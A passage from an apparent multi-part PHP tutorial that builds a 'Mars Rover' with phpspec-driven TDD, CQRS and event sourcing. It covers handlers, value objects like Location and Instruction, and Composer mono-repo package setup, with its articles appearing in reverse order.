const Y = 42;
const ORIENTATION = Orientation::NORTH;
const LOCATION = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_finds_a_rover_latest_location(
FindLatestLocation $findLatestLocation
) {
$this->beConstructedWith($findLatestLocation);
$location = new Location(
new Coordinates(self::X, self::Y),
new Orientation(self::ORIENTATION)
);
$findLatestLocation->find()->willReturn($location);
$this->handle()->shouldBe($location);
}
}
Let's update src/MarsRover/Location/Service/FindLatestLocation.php to add the return type:
<?php
namespace MarsRover\Location\Service;
use MarsRover\Geolocation\Location;
interface FindLatestLocation
{
public function find() : Location;
}
And finally let's update src/MarsRover/Location/LocateRoverHandler.php:
<?php
namespace MarsRover\Location;
use MarsRover\Geolocation\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle() : Location
{
return $this->findLatestLocation->find();
}
}
Now tests should pass:
vendor/bin/phpspec run
All green! Let's check all tests across our project:
cd ../../
vendor/bin/phpspec run
Super green! We can now commit our work:
git add -A
git commit -m 'Moved geolocation value objects in their package'
git checkout master
git merge --no-ff 5-location
And that's it! We now have a fully functional Mars Rover, that covers the following use cases:
- Mars Rovers need first to be landed at a given position. A position is composed of coordinates (x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
- Once a rover has been landed on Mars it is possible to drive them, using instructions such as: move_forward (keeps orientation, but moves along the x or y axis) and turn_left / turn_right (keeps the same coordinates, but changes the orientation).
- Mars rover will be requested to give its current location (x and y coordinates and the orientation).
In order to follow the CQRS principle, we've decided to separate our code in two main packages:
- navigation: write logic
- location: read logic

With this we can imagine deploying navigation on a central, restricted-access server, and deploying many location servers, all synchronized with the data received in navigation.
Splitting our code into many packages would have been quite bothersome without Mono Repo: all our packages are versioned in the same git repository and can be linked together using Composer.
For each use case, we've structured our code as follows:
With Event Sourcing, the "actual work" for "write" use cases is simply creating an event and storing it. For the "read" use cases it could be retrieving the latest state by replaying all the past events in the store, or simply retrieving the latest state from a cache.
And last but not least, we've written tests before writing the actual code, which helped us think about how the code will be used. Our test method names were written as if they were sentences, which makes our tests descriptive and accurate documentation. And of course our tests make sure we don't introduce regressions.
I hope this series has helped to introduce you to those concepts.
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
x and y coordinates and the orientation).
In this article we're going to create a new package for the geolocation value
objects (Location, Coordinates and Orientation).
geolocation package

We can start by creating the directory:
git checkout 5-location
mkdir -p packages/geolocation
cd packages/geolocation
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/geolocation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Geolocation",
"autoload": {
"psr-4": { "MarsRover\\Geolocation\\": "src/MarsRover/Geolocation" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and to get the most out of it we'd like to use its SpecGen extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add -A
git commit -m '5: Created Geolocation package'
Adding geolocation to the project

Let's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/geolocation": "*@dev",
"mars-rover/location": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
geolocation:
namespace: 'MarsRover\Geolocation'
src_path: packages/geolocation/src
spec_path: packages/geolocation
location:
namespace: 'MarsRover\Location'
src_path: packages/location/src
spec_path: packages/location
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '5: Added geolocation package to main project'
Adding geolocation to navigation

Now let's go to the navigation package:
cd packages/navigation
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/geolocation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a third commit:
git add -A
git commit -m '5: Added geolocation package to navigation package'
Adding geolocation to location

Now let's go to the location package:
cd ../location
This time, in addition to a new line in the require section we also need to
add a new repositories section to our composer.json file:
{
"name": "mars-rover/location",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Location",
"autoload": {
"psr-4": { "MarsRover\\Location\\": "src/MarsRover/Location" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/geolocation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a fourth and last commit:
git add -A
git commit -m '5: Added geolocation package to location package'
We've now created a geolocation package that is shared between navigation
and location, keeping them both separate.
In the next article, we'll start moving our value objects to our new package.
We've already developed the first use case about landing the rover on Mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (x and y coordinates and the orientation).
In this article we're going to refactor the locating logic by introducing a Location value object:
git checkout 5-location
Our LocateRoverHandler relies on a FindLatestLocation service. They both currently return an array containing the coordinates and orientation of our rover. Since FindLatestLocation is an interface, we can't control what's actually being returned... This could be fixed by specifying a Location object as a return type, which would make things more explicit.
Since our Location object will contain Coordinates and Orientation, we might want to create it in the navigation package, where those two other objects already are:
cd packages/navigation
We can now start writing Location's test:
vendor/bin/phpspec describe 'MarsRover\Navigation\Location'
This should have bootstrapped the following
spec/MarsRover/Navigation/LocationSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Location;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LocationSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Location::class);
}
}
We can then edit it to specify that it should contain Coordinates and
Orientation:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Coordinates;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LocationSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_coordinates()
{
$coordinates = new Coordinates(self::X, self::Y);
$orientation = new Orientation(self::ORIENTATION);
$this->beConstructedWith($coordinates, $orientation);
$this->getCoordinates()->shouldBe($coordinates);
}
function it_has_orientation()
{
$coordinates = new Coordinates(self::X, self::Y);
$orientation = new Orientation(self::ORIENTATION);
$this->beConstructedWith($coordinates, $orientation);
$this->getOrientation()->shouldBe($orientation);
}
}
That sounds simple enough; we can run the tests:
vendor/bin/phpspec run
And of course they fail because Location doesn't exist yet. To help us write it, phpspec bootstrapped the following src/MarsRover/Navigation/Location.php file:
<?php
namespace MarsRover\Navigation;
class Location
{
private $coordinates;
private $orientation;
public function __construct(Coordinates $coordinates, Orientation $orientation)
{
$this->coordinates = $coordinates;
$this->orientation = $orientation;
}
public function getCoordinates()
{
}
public function getOrientation()
{
}
}
Let's complete it:
<?php
namespace MarsRover\Navigation;
class Location
{
private $coordinates;
private $orientation;
public function __construct(
Coordinates $coordinates,
Orientation $orientation
) {
$this->coordinates = $coordinates;
$this->orientation = $orientation;
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : Orientation
{
return $this->orientation;
}
}
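To see the value object in action, here's a self-contained usage sketch. Coordinates and Orientation are simplified stand-ins for the package's actual classes (their validation logic is omitted here):

```php
<?php
// Simplified stand-ins for the package's Coordinates and Orientation classes.

class Coordinates
{
    private $x;
    private $y;

    public function __construct(int $x, int $y)
    {
        $this->x = $x;
        $this->y = $y;
    }

    public function getX(): int { return $this->x; }
    public function getY(): int { return $this->y; }
}

class Orientation
{
    const NORTH = 'north';

    private $orientation;

    public function __construct(string $orientation)
    {
        $this->orientation = $orientation;
    }

    public function get(): string { return $this->orientation; }
}

// The Location value object, as defined in the article.
class Location
{
    private $coordinates;
    private $orientation;

    public function __construct(Coordinates $coordinates, Orientation $orientation)
    {
        $this->coordinates = $coordinates;
        $this->orientation = $orientation;
    }

    public function getCoordinates(): Coordinates { return $this->coordinates; }
    public function getOrientation(): Orientation { return $this->orientation; }
}

$location = new Location(new Coordinates(23, 42), new Orientation(Orientation::NORTH));
```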
This should be enough to make our tests pass:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '5: Created Location'
This Location value object looks great! Why didn't we create it in the first place? That's pragmatism for you: don't create something you might need in the future, create something you need now. But now that it's here, we can refactor LandRover to use it.
First let's update its test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Location;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_location()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$location = $this->getLocation();
$location->shouldHaveType(Location::class);
$coordinates = $location->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
$location->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
Then its code:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $location;
public function __construct($x, $y, $orientation)
{
$this->location = new Location(
new Coordinates($x, $y),
new Orientation($orientation)
);
}
public function getLocation() : Location
{
return $this->location;
}
}
And finally LandRoverHandler:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$location = $landRover->getLocation();
$coordinates = $location->getCoordinates();
$orientation = $location->getOrientation();
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $coordinates->getX(),
'y' => $coordinates->getY(),
'orientation' => $orientation->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Let's check the tests:
vendor/bin/phpspec run
All green! That should be enough to commit:
git add -A
git commit -m '5: Used Location in LandRover'
While we've been playing with the notion of Location since the very first use case, it's only now, when we really need it, that we've created it.
It encapsulates X and Y coordinates as well as an orientation.
Location is currently in the navigation package, but we also need it in
the location package... To fix this we have the following solutions:
- make navigation a dependency of location
- duplicate the code in both navigation and location
- create a new geolocation package, with Location, Coordinates and Orientation

Since we want to keep navigation and location separate, we'll opt for the third option and create this new package in the next article.
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (x and y coordinates and the orientation).
In this article we're going to create the locating logic:
cd packages/location
git checkout 5-location
As usual, we're going to use our Command Bus twist:
However, in this case we don't have any input parameters: we only want the location of the rover. So do we really need to create an empty LocateRover class?
If in the future we want to handle many rovers (a Rover name or ID parameter) or if we want to know the location of a rover at a given time (time parameter), then having this empty class can make sense: we can then fill it later.
However, in this tutorial we don't have such a need, so we can be pragmatic about it and just omit it.
Let's start straight away by creating the LocateRoverHandler. We begin by bootstrapping the test class:
vendor/bin/phpspec describe 'MarsRover\Location\LocateRoverHandler'
This should create the following
spec/MarsRover/Location/LocateRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Location\LocateRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LocateRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LocateRoverHandler::class);
}
}
We'll need a service which is able to replay all the landing and driving events
to compute the latest location of the rover. Let's call it FindLatestLocation.
Or maybe it'd be faster to compute that latest location on the fly, as we receive each landing and driving event? In that case our FindLatestLocation would just need to retrieve those values from a sort of cache.
It sounds like there can be many ways of finding the rover's location, and committing to one right now only to find out later that another implementation was better would be a shame. So let's delay our decision and rely on an interface for now:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
use PhpSpec\ObjectBehavior;
class LocateRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
const LOCATION = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_finds_a_rover_latest_location(
FindLatestLocation $findLatestLocation
) {
$this->beConstructedWith($findLatestLocation);
$findLatestLocation->find()->willReturn(self::LOCATION);
$this->handle()->shouldBe(self::LOCATION);
}
}
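The FindLatestLocation interface the spec relies on can be tiny. As an illustration, here's a sketch with one of the possible implementations mentioned above; the class name FindLatestLocationFromCache is hypothetical, not part of the article's code:

```php
<?php
// The small interface we delay the implementation decision behind.

interface FindLatestLocation
{
    public function find();
}

// Hypothetical cache-backed implementation: the latest location was
// pre-computed while receiving events, so find() just returns it.
class FindLatestLocationFromCache implements FindLatestLocation
{
    private $cache;

    public function __construct(array $cache)
    {
        $this->cache = $cache;
    }

    public function find()
    {
        return $this->cache;
    }
}

$finder = new FindLatestLocationFromCache([
    'x' => 23,
    'y' => 42,
    'orientation' => 'north',
]);
```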
It might be our smallest Handler of all. Since it only uses one service, we might start wondering whether it was worth having a handler at all (we could just use the FindLatestLocation service directly); after all, we did skip the Command for similar reasons.
However, if we throw away our handler, we'll lose our "automated use case documentation": the service is an interface and cannot be tested. So let's keep it. Let's run the tests now:
vendor/bin/phpspec run
They fail because LocateRoverHandler doesn't exist, but phpspec bootstrapped
it for us in the src/MarsRover/Location/LocateRoverHandler.php file:
<?php
namespace MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle()
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle()
{
return $this->findLatestLocation->find();
}
}
Overall, the code looks very similar to the test. Let's run them again:
vendor/bin/phpspec run
All green! We can commit our work:
git add -A
git commit -m '5: Created LocateRoverHandler'
Locating the rover is as simple as retrieving it from somewhere. We've delegated the decision on where this "somewhere" is because there are many valid solutions (replaying all the events from the EventStore, a cache, etc).
Delegating those decisions can be done by creating an interface, it allows us to create as many implementations as we want, without having to modify the logic we've just written.
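To make that concrete, here's a self-contained sketch wiring the handler to an inline stub. The handler and interface reproduce the article's code; the anonymous-class stub stands in for any real implementation (event replay, cache, etc.):

```php
<?php
interface FindLatestLocation
{
    public function find();
}

class LocateRoverHandler
{
    private $findLatestLocation;

    public function __construct(FindLatestLocation $findLatestLocation)
    {
        $this->findLatestLocation = $findLatestLocation;
    }

    public function handle()
    {
        return $this->findLatestLocation->find();
    }
}

// Any implementation can be swapped in without touching the handler.
$stub = new class implements FindLatestLocation {
    public function find()
    {
        return ['x' => 23, 'y' => 42, 'orientation' => 'north'];
    }
};

$location = (new LocateRoverHandler($stub))->handle();
```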
The Test Driven Development cycle wouldn't be complete without a refactoring
step. In the next article we'll create a Location value object, to make our
FindLatestLocation and LocateRoverHandler classes return something more
explicit.
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now going to start developing the last one, requesting its location:
Mars rover will be requested to give its current location (x and y coordinates and the orientation).
In this article we're going to create a new package for the location logic.
Until now we've been putting our Landing and Driving code in the navigation
package. It's a "write" type of logic: an event occurs and we log it in the
Event Store.
On the other hand, requesting the location of the rover is a "read" type of logic. Since we've decided to follow the CQRS principle, we're going to separate them and put it in its own package.
The benefit of this approach becomes more apparent if we decide to create web APIs to control our Mars Rover and replicate the data across multiple servers: we could put the "write" endpoints on a single "Publisher" server, and the "read" endpoints on many "Subscriber" servers.
The "Subscriber" servers only need to synchronize their data with the "Publisher" server, allowing us to scale.
Creating the location package

We can start by creating the directory:
git checkout -b 5-location
mkdir -p packages/location
cd packages/location
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/location",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Location",
"autoload": {
"psr-4": { "MarsRover\\Location\\": "src/MarsRover/Location" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and to get the most out of it we'd like to use its SpecGen extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add -A
git commit -m '5: Created Location package'
Adding location to the project

Let's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/location": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
location:
namespace: 'MarsRover\Location'
src_path: packages/location/src
spec_path: packages/location
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '5: Added location package to main project'
In order to keep the "write" logic in the navigation package separated
from the "read" logic, we've created a new location package.
In the next article, we'll start creating the LocateRoverHandler class.
We've already developed the first use case about landing the rover on mars, and we've started the second one about driving it:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as move_forward (keeps orientation, but moves along the x or y axis) or turn_left / turn_right (keeps the same coordinates, but changes the orientation).
In this article we're going to create the actual driving logic, using Event Sourcing:
cd packages/navigation
git checkout 4-driving
Following our Command Bus twist, we're now going to create the DriveRoverHandler class that's going to take care of the actual logic associated with the DriveRover use case. We start by bootstrapping the test class:
vendor/bin/phpspec describe 'MarsRover\Navigation\DriveRoverHandler'
This should create the following
spec/MarsRover/Navigation/DriveRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\DriveRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class DriveRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(DriveRoverHandler::class);
}
}
Event Sourcing is
all about recording significant actions. Driving a rover seems significant
enough, so that's what DriveRoverHandler should do:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\DriveRover;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverHandlerSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
const EVENT_NAME = 'rover_driven';
const EVENT_DATA = [
'instruction' => self::DRIVING_INSTRUCTION,
];
function it_drives_a_rover_with_given_instruction(
AnEventHappened $anEventHappened,
Event $roverDriven,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$driveRover = new DriveRover(
self::DRIVING_INSTRUCTION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverDriven);
$eventStore->log($roverDriven)->shouldBeCalled();
$this->handle($driveRover);
}
}
It's very similar to what we've done for LandRoverHandler: all we've done is create an event specific to driving the rover with its instruction and "log" it in an EventStore. Let's run the tests:
vendor/bin/phpspec run
They fail because DriveRoverHandler doesn't exist, but phpspec bootstrapped it for us in the src/MarsRover/Navigation/DriveRoverHandler.php file:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\EventStore;
class DriveRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(AnEventHappened $anEventHappened, EventStore $eventStore)
{
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class DriveRoverHandler
{
const EVENT_NAME = 'rover_driven';
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
$roverDriven = $this->anEventHappened->justNow(self::EVENT_NAME, [
'instruction' => $driveRover->getInstruction()->get(),
]);
$this->eventStore->log($roverDriven);
}
}
Overall, the code looks very similar to the test. Let's run them again:
vendor/bin/phpspec run
All green! We're going to do a quick refactoring to move the event name into the src/MarsRover/Navigation/Events.php file:
<?php
namespace MarsRover\Navigation;
class Events
{
const ROVER_LANDED = 'rover_landed';
const ROVER_DRIVEN = 'rover_driven';
}
Then use it in the code:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class DriveRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
$roverDriven = $this->anEventHappened->justNow(Events::ROVER_DRIVEN, [
'instruction' => $driveRover->getInstruction()->get(),
]);
$this->eventStore->log($roverDriven);
}
}
and finally in the test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\DriveRover;
use MarsRover\Navigation\Events;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverHandlerSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
const EVENT_NAME = Events::ROVER_DRIVEN;
const EVENT_DATA = [
'instruction' => self::DRIVING_INSTRUCTION,
];
function it_drives_a_rover_with_given_instruction(
AnEventHappened $anEventHappened,
Event $roverDriven,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$driveRover = new DriveRover(
self::DRIVING_INSTRUCTION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverDriven);
$eventStore->log($roverDriven)->shouldBeCalled();
$this->handle($driveRover);
}
}
We can run the tests one last time:
vendor/bin/phpspec run
Still green! We can commit our work:
git add -A
git commit -m '4: Created DriveRoverHandler'
git checkout master
git merge --no-ff 4-driving
With Event Sourcing, the logic associated to our "Driving a Rover on Mars" use case is quite simple: we just record it as an event.
In the next article, we'll create a new package to take care of the last use case: "Requesting the Rover's location".
We've already developed the first use case about landing the rover on Mars, and we've started the second one about driving it:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as move_forward (keeps orientation, but moves along the x or y axis) or turn_left / turn_right (keeps the same coordinates, but changes the orientation).
In this article we're going to refactor DriveRover:
cd packages/navigation
git checkout -b 4-driving
By having a look at DriveRover, we can guess that it has one reason to change: the list of instructions might grow bigger.
This hints toward one new class: Instruction. Let's get cracking!
First let's bootstrap the test class using phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Instruction'
This will create the following spec/MarsRover/Navigation/InstructionSpec.php
file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class InstructionSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Instruction::class);
}
}
We can edit it, reusing what we've done in the DriveRover test class, only with more information about the possible instructions:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class InstructionSpec extends ObjectBehavior
{
const MOVE_FORWARD = 'move_forward';
const TURN_LEFT = 'turn_left';
const TURN_RIGHT = 'turn_right';
const INVALID_INSTRUCTION = 'wake_up_polly_parrot';
function it_can_be_move_forward()
{
$this->beConstructedWith(self::MOVE_FORWARD);
$this->get()->shouldBe(self::MOVE_FORWARD);
}
function it_can_be_turn_left()
{
$this->beConstructedWith(self::TURN_LEFT);
$this->get()->shouldBe(self::TURN_LEFT);
}
function it_can_be_turn_right()
{
$this->beConstructedWith(self::TURN_RIGHT);
$this->get()->shouldBe(self::TURN_RIGHT);
}
function it_cannot_be_anything_else()
{
$this->beConstructedWith(self::INVALID_INSTRUCTION);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Since this test is dedicated to instructions, we feel freer than in DriveRover to describe all the possible instructions. If we run the tests now, phpspec will bootstrap the Instruction class for us:
vendor/bin/phpspec run
Indeed, it created the src/MarsRover/Navigation/Instruction.php file:
<?php
namespace MarsRover\Navigation;
class Instruction
{
public function __construct($argument)
{
}
public function get()
{
}
}
All that's left for us to do is complete it; we can reuse the code from DriveRover:
<?php
namespace MarsRover\Navigation;
class Instruction
{
const MOVE_FORWARD = 'move_forward';
const TURN_LEFT = 'turn_left';
const TURN_RIGHT = 'turn_right';
const VALID_INSTRUCTIONS = [
self::MOVE_FORWARD,
self::TURN_LEFT,
self::TURN_RIGHT,
];
private $instruction;
public function __construct($instruction)
{
if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
throw new \InvalidArgumentException(
'Instruction should be one of: '
.implode(', ', self::VALID_INSTRUCTIONS)
);
}
$this->instruction = $instruction;
}
public function get() : string
{
return $this->instruction;
}
}
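As a quick sanity check outside of phpspec, here's how the value object behaves. The class is copied from above so the snippet is self-contained:

```php
<?php
// The Instruction value object, as defined in the article.
class Instruction
{
    const MOVE_FORWARD = 'move_forward';
    const TURN_LEFT = 'turn_left';
    const TURN_RIGHT = 'turn_right';

    const VALID_INSTRUCTIONS = [
        self::MOVE_FORWARD,
        self::TURN_LEFT,
        self::TURN_RIGHT,
    ];

    private $instruction;

    public function __construct($instruction)
    {
        if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
            throw new \InvalidArgumentException(
                'Instruction should be one of: '
                .implode(', ', self::VALID_INSTRUCTIONS)
            );
        }
        $this->instruction = $instruction;
    }

    public function get() : string
    {
        return $this->instruction;
    }
}

// Happy path: a valid instruction is stored as-is.
$forward = new Instruction(Instruction::MOVE_FORWARD);

// Unhappy path: anything else throws at construction time.
try {
    new Instruction('wake_up_polly_parrot');
    $threw = false;
} catch (\InvalidArgumentException $e) {
    $threw = true;
}
```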
We can now run the tests:
vendor/bin/phpspec run
All green! Instruction is ready to be used in DriveRover, so let's update
its test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->get()->shouldBe(self::DRIVING_INSTRUCTION);
}
}
We no longer need to check for invalid instructions as we trust Instruction
to take care of it for us. Now let's update its code:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $instruction;
public function __construct($instruction)
{
$this->instruction = new Instruction($instruction);
}
public function getInstruction() : Instruction
{
return $this->instruction;
}
}
And that should make our tests pass:
vendor/bin/phpspec run
All green! We can refactor Instruction test class a bit, by reusing
Instruction constants:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class InstructionSpec extends ObjectBehavior
{
const MOVE_FORWARD = Instruction::MOVE_FORWARD;
const TURN_LEFT = Instruction::TURN_LEFT;
const TURN_RIGHT = Instruction::TURN_RIGHT;
const INVALID_INSTRUCTION = 'wake_up_polly_parrot';
function it_can_be_move_forward()
{
$this->beConstructedWith(self::MOVE_FORWARD);
$this->get()->shouldBe(self::MOVE_FORWARD);
}
function it_can_be_turn_left()
{
$this->beConstructedWith(self::TURN_LEFT);
$this->get()->shouldBe(self::TURN_LEFT);
}
function it_can_be_turn_right()
{
$this->beConstructedWith(self::TURN_RIGHT);
$this->get()->shouldBe(self::TURN_RIGHT);
}
function it_cannot_be_anything_else()
{
